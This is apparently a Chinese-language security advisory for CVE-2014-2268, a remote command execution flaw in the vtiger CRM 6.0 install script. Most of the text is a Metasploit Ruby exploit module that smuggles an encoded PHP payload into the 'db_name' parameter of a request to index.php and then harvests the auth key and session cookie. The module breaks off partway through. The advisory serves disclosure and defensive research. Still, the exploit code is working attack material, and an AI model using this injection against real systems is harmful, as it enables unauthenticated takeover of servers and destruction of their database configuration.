vtiger CRM远程代码执行漏洞

发布日期：2014-04-10
更新日期：2014-04-15

受影响系统：
vtiger vtiger CRM 6.0
 vtiger vtiger CRM
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 66758
 CVE(CAN) ID: CVE-2014-2268
 
vtiger CRM是免费的开源客户关系管理软件。
 
vtiger CRM 6.0及其他版本的安装脚本内存在任意命令执行漏洞，未经身份验证的攻击者经"db_name"参数提交到index.php脚本的输入如果没有被有效过滤，即可触发此漏洞，使远程攻击者可以执行任意命令。
 
<*来源：Jonathan
 
  链接：
       
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

# Application database configuration is overwritten
  Rank = ManualRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Vtiger Install Unauthenticated Remote Command Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability in the
        Vtiger install script. This module is set to ManualRanking due to this
        module overwriting the target database configuration, which may result in
        a broken web app, and you may not be able to get a session again.
      },
      'Author'        =>
        [
          'Jonathan Borgeaud < research[at]navixia.com >' # Navixia Research Team
        ],
      'License'        => MSF_LICENSE,
      'References'    =>
        [
          [ 'CVE', '2014-2268' ],
          [ 'URL', 'https://www.navixia.com/blog/entry/navixia-find-critical-vulnerabilities-in-vtiger-crm-cve-2014-2268-cve-2014-2269.html'],
          [ 'URL', 'https://vtiger-crm.2324883.n4.nabble.com/Vtigercrm-developers-IMP-forgot-password-and-re-installation-security-fix-tt9786.html'],

],
      'Privileged'    => false,
      'Platform'      => ['php'],
      'Payload'        =>
        {
          'Space'      => 4000,
          'BadChars'    => "#",
          'DisableNops' => true,
          'Keys'        => ['php']
        },
      'Arch'          => ARCH_PHP,
      'Targets'        => [[ 'Vtiger 6.0.0 or older', { }]],
      'DisclosureDate' => 'Mar 5 2014',
      'DefaultTarget'  => 0))

register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to Vtiger', '/'])
        ], self.class)
  end

def exploit
    print_status("Injecting payload...")
    rand_arg = Rex::Text.rand_text_hex(10)
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'index.php'),
      'headers'  => {'X-Requested-With' => rand_text_alpha(5)},
      'vars_get' => {
          'module'  => 'Install',
          'view'    => 'Index',
          'mode'    => 'Step5',
          'db_name' => "127.0.0.1'; if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } // "
      }})

# Check timeout
    if not res
      print_error("Request timed out, please try again")
      return
    end

if res.body =~ /name="auth_key"\s+value=".*?((?:[a-z0-9]*))"/i
      authkey  = $1
      phpsessid = res.get_cookies